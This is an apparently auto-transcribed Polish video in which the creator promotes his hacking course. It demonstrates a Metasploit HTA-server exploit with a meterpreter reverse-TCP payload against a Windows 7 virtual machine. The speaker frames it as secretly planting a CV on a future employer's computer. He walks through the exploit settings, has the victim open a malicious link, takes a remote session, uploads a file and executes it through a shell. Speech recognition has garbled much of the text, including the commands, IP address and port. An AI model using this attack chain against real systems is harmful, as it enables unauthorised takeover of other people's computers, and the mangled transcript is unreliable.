Cześć! Jako, że dawno już nie nagrywałem, wypadałoby coś wrzucić nowego tutaj na kanał, moi drodzy. Jak już wszyscy dobrze wiecie, powstał mój kurs. Oczywiście serdecznie was zapraszam do wzięcia udziału w moim kursie. Gdyby ktoś był zainteresowany, oczywiście link do zakupu kursu jest w pierwszym komentarzu w opisie tego kursu. Z kursu naprawdę możecie wiele wyciągnąć. Oczywiście możecie też poszukać jakie są opinie o kursie. Wszyscy praktycznie zadowoleni. Z kursu naprawdę można wyciągnąć wiele, wiele i jeszcze raz wiele, cały szczegółowy opis czego można się nauczyć z kursu jest oczywiście tutaj w opisie kursu, jakkolwiek to brzmi. Dobra, ale przechodząc do meritum, wyobraźmy sobie, że no powiedzmy pentester ma zadanie zostawić no powiedzmy otwarte swoje CV u swojego przyszłego pracodawcy, nie wnikajmy w szczegóły. Możliwości na zainfekowanie systemu jest naprawdę sporo i w tym wykładzie zobaczymy sobie, jak za pomocą no, specjalnego exploita przyjąć kontrolę nad e, takim właśnie systemem. Tutaj będzie oczywiście brane pod uwagę Windows. Jako, że mam dostępną wirtualkę, maszynę wirtualną na Windows 7, to z niej skorzystam. Dobra. I moim zadaniem będzie tutaj otwarcie tego, przesłanie tego pliku i otwarcie tego tutaj przykładowego CD, które pobrałem gdzieś tam sobie z grafik Google Dobra. Przechodząc do meritum, odpalmy sobie terminal. ruchomy Metasploit Framework. Poczekajmy, aż się wszystko uruchomi. OK, uruchomiło nam się. Dajemy sobie może na cały ekran. I teraz wypadałoby załadować tego exploita, więc przynajmniej use exploit Windows. Oczywiście uzupełniamy tabulatorem miejsc HTA serwer. OK, daliśmy enter. Zadajmy sobie teraz payload, czyli set payload. Windows, tutaj oczywiście nam od góry, od góry podpowiada. Windows meterpreter reverse tcp OK, dajemy sobie options. Ok, no przede wszystkim widzimy, że już mamy lhosta hosta na nasz adres IP. Teraz jeszcze z hosta musi ustawić. Piszemy set srv host 192, może dajemy to z dużej, wszystko sr host 192 168, 027 set lport, Jeszcze musimy sobie przedstawić na 8 8, 8 1, 1, 1, Ok, dajemy exploit. Okej, okay, elegancko, jak widzimy wygenerował nam się specjalny link, który musimy umieścić na naszej zainfekowanej maszynie Oczywiście możliwości na umieszczenie takiego linku jest sporo, na podmianę takiego linku, takie rzeczy też omawiam na moim kursie Dobra, także sobie ręcznie w tym wyjątku przeklepiemy Ja sobie na, tej, na mojej drugiej maszynce to szybciutko odpalę i zaraz Wam też pokażę Okay, w momencie gdy mm, wprowadziłem ten adres IP tutaj na górę, oczywiście można było to w inny sposób zrobić, Wyświetlono nam się pobieranie pliku, no to pobieranie pliku trzeba otworzyć, dajemy zapisz plik i oczywiście uruchomić. Oczywiście sposobów na zainfekowanie maszyny, czy tam systemu jest naprawdę wyższym od grona, tutaj omawiamy taki prosty przykładzik i czekamy aż teraz się tutaj wszystko nam uruchomi. Widzimy, że payload został dorę doręczony, możemy sobie jeszcze raz tutaj kliknąć. O, już widzimy, że mamy sending. Tak, i otworzyła nam się sesja meterpretera. No i elegancko, czyli teraz już mamy, że tak powiem, pełny dostęp. Dajmy sobie session, pierwsza na pewno to jest i mamy pełny dostęp do y, meterpretera. No to tutaj nas będzie interesowało w tej chwili, abyśmy przerzucili ten plik na tą drugą maszynkę. Czyli dajmy upload i dajemy nazwę tego pliku, czyli CVPNG. Możemy sobie zerknąć, czy tutaj nam się podrzucił ten plik oczywiście na pulpicie go nie ma, ale to nic strasznego na pewno będzie w pobranych no tak, jest, więc teraz możemy sobie to w inny sposób zrobić, możemy wejść do shell'a okej, okay. widzimy, że już znajdujemy się w linii w pobranych, więc teraz po prostu napiszemy sobie start cv png widzimy, że się odpaliło tak przejdźmy sobie tutaj do tej maszynki i widzimy elegancko. E, mamy tutaj już na pulpicie otwartą naszą e, nasze CV. Także tak by to, moi drodzy, wyglądało jeżeli chodzi tutaj o takie krótki pokaz. Ja was oczywiście serdecznie zapraszam do wzięcia udziału w moim kursie. Możliwości nauczania się jest naprawdę wiele, jest sporo chętnych No i oczywiście e, w ramach tutaj pomocy e, w cenie kursu jest moja pomoc na Discordzie, jeżeli ktoś by taką e, taką potrzebował. Także dzięki, trzymajcie się, cześć.